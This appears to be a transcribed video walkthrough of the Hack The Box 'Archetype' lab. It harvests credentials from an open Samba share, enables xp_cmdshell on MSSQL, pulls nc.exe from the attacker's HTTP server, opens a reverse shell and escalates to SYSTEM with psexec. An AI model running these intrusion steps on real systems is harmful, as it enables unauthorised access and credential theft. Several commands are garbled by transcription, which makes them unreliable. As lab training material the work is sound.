Welcome back. On this machine we are going to use a different methodology in which we will perform privilege escalation. In order to solve this, we need to understand that there are 6 pieces to this puzzle. First, we are going to gain a foothold through an unsecure Samba share. For the second part, we'll make our way inside the Microsoft SQL server using the XP command shell. For the third phase, we'll cover how to upload a payload to the SQL server and set up a listening port in order to get the shell back to us. On part 4, once a reverse shell has been established, we have to find the user flag. On part 5, we start getting administrator privileges. On part 6, we exploit writable shares on Samba to get the root flag. Start by running the nmap as usual for reconnaissance. Type nmap-s -d-s -c -v, then the target's IP address. The results will show some open ports including a Samba client. Here we can also see the name of the host machine we are targeting. In this case, it is found under NetBIOS computer name, ARCHETYPE. Below it, there's the name and version of the server, which in our case is a Microsoft SQL server under port 1433. Part 2. Accessing a vulnerable Samba share. Since we know this is a Samba client, we now want to list the files inside of it. In order to do that, type Samba client-L, then the target's IP address, and it will pop up a list of all the shares in it. Take a look at the backup share. As you can see, it doesn't have a $sign at the end, meaning that it is the only non-administrative share available. Let's access the backup share by typing samba / the target's IP address / backups. Now you need to get that prod.dts config file. Once we concatenate the prod.dts config file, we can see that there's a user ID and also a password in there. Part 3. Checking the Microsoft SQL service, using netcat and establishing a listening port. So far we know there's a vulnerable Samba share. We got a user ID and a password from it, but after that there's not much we can do with it. So the other avenue will be to perform Microsoft SQL client.py, which is a script that supports SQL authentication with either a password or the password hash. We can find this script under in packet. You should be able to find this in newer versions of Kali. If not, you can find the repository in GitHub. Let's start by finding the path to the Microsoft SQL client.py. Type locate mssql client.py. In my case, I found it under user/bin/examples/mssql client.py. Type the whole path and then type the user ID, in this case archetype/SQL_SVC at the target's IP address, then type the Windows auth flag. We are prompted to enter a password. Use the megacore password found on the prod.dts config file. Now there's a connection to the SQL service. Try help to list the available commands. Enable the XP command shell. This will spawn a Windows command shell. Notice that the configuration option has changed from 0 to 1. Now it's set to true. Run the reconfigure statement to install. We should have now command execution. To prove that, type xp_command shell who am I. Perfect, we get back our user account. On a new terminal, locate the nc.exe file. It should be under Windows Resources and Binaries. Make sure it is in the same directory we are currently working in. In my case, I moved it to the home directory to keep it simple. Here is where people can take a different approach to it. Some might want to use mfsvenom through Meterpreter in order to execute a payload and therefore use the mfs console to set up a listening port. In my case, I wanted to plant nc.exe as a backdoor in order to execute a reverse shell. Type sudo python3 -m http.server80. Back to the SQL service, type xp_command shell open quotes PowerShell -c cd capital C : /users /SQL_service /downloads wget http /my own IP /nc.exe -outfile nc.exe close quotes. I have done this machine before, so I know what I'm looking for is under users. But if it's your first time, you can start listing directories just typing xp_command shell quote PowerShell -c cd capital C : dir close quotes and make your way through it. In any case, once this is done, we open a new terminal and set up our netcat listener. Type nc-L to listen to an incoming connection. B for verbose output, N so it won't perform domain name resolution, and P to specify the source port NC should use. And finally, type qual4. Back to the SQL service, we need to get the shell from the remote machine back to us. This time type xp_command shell open quotes PowerShell -c cd capital C : /users /SQL_service /downloads /nc.exe cmd.exe your own IP address and qual4 close quotes. Part 4. Now that we set up a reverse shell, we need to find the first flag, the user flag. Back on the listening port, we should have access to the Windows machine. Change directories. List them. Now change directories again into desktop. I know this because by default, most Hack the Boss machines will have their flags in the desktop. List the files under the desktop and there we see the 32user.txt. For Windows machines, we use type instead of the get command we use in Linux. So type 32user.txt. And perfect, we got the user flag. I forgot to mention that whenever you see an HTTP 200 request when listening to port 80, that means that the request has succeeded. Part 5. Gaining administrator privileges. In a new terminal, we start another Python server on our local machine. Type sudo python3-m http.server80 and then turn this into a PowerShell. Now make sure you have downloaded the Windows Privilege Escalation Awesome script, also known as winPEAS x64.exe. You can find this on GitHub. After turning this into a PowerShell, we're going to retrieve content from a web server. wget http:// your own IP /winPEAS x64.exe -out file winPEAS.exe. Back on the HTTP service terminal, we have a green light since there is a 200 response. You can close this HTTP service terminal. Let's check on the Windows machine that the winPEAS script is there. List the files on their desktop. There it is, our winPEAS.exe file. Now we type winPEAS.exe to run all checks. This might take a few seconds or minutes. Just so you know, the output will be color-coded. From a pen testing point of view, everything you see in red indicates a special privilege over an object or something is misconfigured. If you check the output, there's multiple mentions of a file named console_host_history.txt. So let's get that file by entering the path to it using the type command. Here we find a log containing a username and another password as well. Part 6. Exploiting writable shares on Samba. For the last part of the puzzle, we're going to use another system administration utility that's integrated in the in-packet collection called psxec. Remember at the beginning when we were listing Samba shares on target machine? One of them was the admin user, and we're going to use psxec to authenticate to the machine. Locate the psxec file and copy the path to it. Then type administrator at the target's IP and hit enter. You may now insert a new password. We find ourselves inside the System32 directory. If you type "who am I," you will see that we have become NT authority, meaning that we have unrestricted access to all system resources. For the Windows ecosystem, it's just another way of saying that we have become root on the remote machine. From there, change directories 2 steps back. Then change directory to users, then to administrator, then to desktop. List the files under desktop and we get a root.txt. Get it using the type command and we are done. We have successfully retrieved the root flag.